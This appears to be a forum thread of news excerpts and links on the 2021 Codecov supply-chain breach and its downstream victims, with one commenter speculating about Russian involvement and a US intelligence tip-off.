"U.S. federal investigators are probing an intrusion at San Francisco-based software auditing company Codecov that affected an unknown number of its 29,000 customers, the firm said, raising the specter of knock-on breaches at companies elsewhere. Codecov said in a statement hackers began tampering with its software - which is used across the tech industry to help test code for mistakes and vulnerabilities - on Jan. 31. However, the intrusion was only detected earlier this month when an astute customer noticed there was something off about the tool, Codecov said. ...the breach drew comparisons to the recent compromise of Texas software firm SolarWinds by alleged Russian hackers, both because the breach could have follow-on effects at many of the organizations that use Codecov and because of the length of time that the doctored software remained in circulation..." https://www.reuters.com/technology/...o-code-testing-company-firm-2021-04-16/?mid=1
"Will the CodeCov breach become the next big software supply chain hack?... ... In particular, the attackers exploited a bug in the company’s Docker image creation process to gain access to a Bash Uploader script designed to map out development environments and report back to the company. This small modification quietly called out for user credentials that could have been used to access and exfiltrate data from their users’ continuous integration environment..." https://www.scmagazine.com/home/sec...come-the-next-big-software-supply-chain-hack/ More here: "Popular Codecov code coverage tool hacked to steal dev credentials..." https://www.bleepingcomputer.com/ne...overage-tool-hacked-to-steal-dev-credentials/
"Hundreds of networks reportedly hacked in Codecov supply-chain attack... In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems... According to federal investigators, Codecov attackers deployed automation to use the collected customer credentials to tap into hundreds of client networks, thereby expanding the scope of this system breach beyond just Codecov's systems. 'The hackers put extra effort into using Codecov to get inside other makers of software development programs, as well as companies that themselves provide many customers with technology services, including IBM,' a federal investigator anonymously told Reuters..." https://www.bleepingcomputer.com/ne...rtedly-hacked-in-codecov-supply-chain-attack/
Probably some US intelligence tipped them off about that. It is hard to believe they accidentally found out and let press know it just when there is rising tension at Russia–Ukraine border. I hope they will clean network out of malware as fast as possible and Russia will be blinded for some time.
Codecov Supply Chain Attack May Hit Thousands: Report https://www.infosecurity-magazine.com/news/codecov-supply-chain-attack-may/
HashiCorp is the latest victim of Codecov supply-chain attack https://www.bleepingcomputer.com/ne...latest-victim-of-codecov-supply-chain-attack/
Codecov starts notifying customers affected by supply-chain attack April 30, 2021 https://www.bleepingcomputer.com/ne...ng-customers-affected-by-supply-chain-attack/
Twilio discloses impact from Codecov supply-chain attack May 4, 2021 https://www.bleepingcomputer.com/ne...oses-impact-from-codecov-supply-chain-attack/
Rapid7 source code, credentials accessed in Codecov supply-chain attack May 13, 2021 https://www.bleepingcomputer.com/ne...ials-accessed-in-codecov-supply-chain-attack/
Codecov hackers gained access to Monday.com source code May 18, 2021 https://www.bleepingcomputer.com/ne...ckers-gained-access-to-mondaycom-source-code/
E-commerce giant suffers major data breach in Codecov incident May 21, 2021 https://www.bleepingcomputer.com/ne...uffers-major-data-breach-in-codecov-incident/
